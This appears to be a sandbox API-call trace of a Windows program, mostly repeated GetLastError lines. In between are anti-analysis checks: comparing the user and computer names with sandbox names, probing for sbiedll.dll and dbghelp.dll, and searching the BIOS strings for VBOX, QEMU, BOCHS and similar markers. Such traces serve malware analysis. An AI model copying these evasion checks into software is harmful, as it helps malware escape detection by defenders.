	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.891] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetNativeSystemInfo (in: lpSystemInfo=0x25af970 | out: lpSystemInfo=0x25af970*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] GetLastError () returned 0xcb
	[0069.892] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Hardware\\DESCRIPTION\\System\\CentralProcessor\\0", phkResult=0x25af9e0 | out: phkResult=0x25af9e0*=0x1c8) returned 0x0
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.893] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x25af570, lpcbData=0x25af9dc*=0x200 | out: lpType=0x0, lpData=0x25af570*=0x49, lpcbData=0x25af9dc*=0x52) returned 0x0
	[0069.894] StrStrIW (lpFirst="Intel (R) Core(TM) i5-7500 CPU @ 3.40GHz", lpSrch="Xeon") returned 0x0
	[0069.894] RegCloseKey (hKey=0x1c8) returned 0x0
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.894] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] GetLastError () returned 0xcb
	[0069.895] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x75070000
	[0069.895] GetProcAddress (hModule=0x75070000, lpProcName="UuidCreateSequential") returned 0x7507db30
	[0069.895] UuidCreateSequential (in: Uuid=0x25af760 | out: Uuid=0x25af760) returned 0x0
	[0069.896] GetLastError () returned 0xcb
	[0069.896] GetLastError () returned 0xcb
	[0069.896] GetLastError () returned 0xcb
	[0069.896] GetLastError () returned 0xcb
	[0069.896] GetLastError () returned 0xcb
	[0069.896] GetLastError () returned 0xcb
	[0069.896] GetLastError () returned 0xcb
	[0069.896] GetLastError () returned 0xcb
	[0069.896] GetLastError () returned 0xcb
	[0069.896] GetLastError () returned 0xcb
	[0069.896] GetLastError () returned 0xcb
	[0069.896] GetLastError () returned 0xcb
	[0069.896] GetLastError () returned 0xcb
	[0069.896] GetLastError () returned 0xcb
	[0069.896] GetLastError () returned 0xcb
	[0069.896] GetLastError () returned 0xcb
	[0069.897] GetModuleHandleA (lpModuleName="dbghelp.dll") returned 0x0
	[0069.897] GetModuleHandleA (lpModuleName="sbiedll.dll") returned 0x0
	[0069.897] GetUserNameA (in: lpBuffer=0x434fa8, pcbBuffer=0x25af810 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0x25af810) returned 1
	[0069.899] lstrcmpA (lpString1="Nd9E1FYi", lpString2="CurrentUser") returned 1
	[0069.899] lstrcmpA (lpString1="Nd9E1FYi", lpString2="Sandbox") returned -1
	[0069.899] GetComputerNameA (in: lpBuffer=0x434fa8, nSize=0x25af810 | out: lpBuffer="X2VS1CUM", nSize=0x25af810) returned 1
	[0069.900] lstrcmpA (lpString1="X2VS1CUM", lpString2="SANDBOX") returned 1
	[0069.900] lstrcmpA (lpString1="X2VS1CUM", lpString2="7SILVIA") returned 1
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.900] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] GetLastError () returned 0xcb
	[0069.901] RegCreateKeyA (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System", phkResult=0x25af7d4 | out: phkResult=0x25af7d4*=0x1f0) returned 0x0
	[0069.901] RegQueryValueExA (in: hKey=0x1f0, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0x25af7cc, lpData=0x434fa8, lpcbData=0x25af7d0*=0x400 | out: lpType=0x25af7cc*=0x7, lpData=0x434fa8*, lpcbData=0x25af7d0*=0x76) returned 0x0
	[0069.902] RegCloseKey (hKey=0x1f0) returned 0x0
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.902] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.903] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] StrStrA (lpFirst="GBT    - 1000", lpSrch="AMI ") returned 0x0
	[0069.904] StrStrA (lpFirst="GBT    - 1000", lpSrch=0x0) returned 0x0
	[0069.904] StrStrA (lpFirst="GBT    - 1000", lpSrch="BOCHS") returned 0x0
	[0069.904] StrStrA (lpFirst="GBT    - 1000", lpSrch="VBOX") returned 0x0
	[0069.904] StrStrA (lpFirst="GBT    - 1000", lpSrch="QEMU") returned 0x0
	[0069.904] StrStrA (lpFirst="GBT    - 1000", lpSrch="SMCI") returned 0x0
	[0069.904] StrStrA (lpFirst="GBT    - 1000", lpSrch="INTEL  - 6040000") returned 0x0
	[0069.904] StrStrA (lpFirst="GBT    - 1000", lpSrch="FTNT-1") returned 0x0
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.904] GetLastError () returned 0xcb
	[0069.905] GetLastError () returned 0xcb
	[0069.905] GetLastError () returned 0xcb
	[0069.905] GetLastError () returned 0xcb
	[0069.905] GetLastError () returned 0xcb
	[0069.907] GetLastError () returned 0xcb
	[0069.907] GetLastError () returned 0xcb
	[0069.907] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] RegCreateKeyA (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System", phkResult=0x25af7d4 | out: phkResult=0x25af7d4*=0x1f0) returned 0x0
	[0069.908] RegQueryValueExA (in: hKey=0x1f0, lpValueName="VideoBiosVersion", lpReserved=0x0, lpType=0x25af7cc, lpData=0x434fa8, lpcbData=0x25af7d0*=0x400 | out: lpType=0x25af7cc*=0x0, lpData=0x434fa8*=0x47, lpcbData=0x25af7d0*=0x400) returned 0x2
	[0069.908] RegCloseKey (hKey=0x1f0) returned 0x0
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] StrStrA (lpFirst="GBT    - 1000", lpSrch="VirtualBox") returned 0x0
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.908] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
